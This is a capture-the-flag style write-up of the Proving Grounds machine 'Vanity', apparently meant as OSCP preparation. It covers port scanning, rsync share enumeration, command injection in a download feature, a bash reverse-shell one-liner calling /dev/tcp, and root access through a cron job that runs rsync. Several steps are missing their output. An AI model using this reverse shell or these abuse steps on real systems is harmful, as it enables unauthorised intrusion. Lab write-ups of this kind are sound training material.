Proving grounds:Vanity

Today we will take a look at Proving grounds: Vanity. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

• Network

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
|   256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
|_  256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vanity Virus Scanner
|_http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• rsync (873)

Enumerate port 873

└─$ rsync  -rdt rsync://192.168.54.234                        
source          Web Source
backup          Virus Samples Backup

Copy the shared folders.

└─$ rsync  -rdt rsync://192.168.54.234/source .

Here we see the system function. We can use this to do command injection.

• web (80)

There is a download section on the site, let’s download and grab the request with burp.

Let’s do the injection command as we saw earlier.

Result BOOM

• Reverse (www-data)

Paste the payload to get the reverse shell.

echo "bash -i >& /dev/tcp/192.168.xx.xx/443 0>&1" | base64

Listen

• Privesc (rsync)

In Crontab, we see the command executed at a certain time, let’s see its content.

We can write and delete whatever we want to the uploads folder, but then the command is executed by rsync.

We see that this setting can be abused to achieve RCE.

prepare our payload

Listen:

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”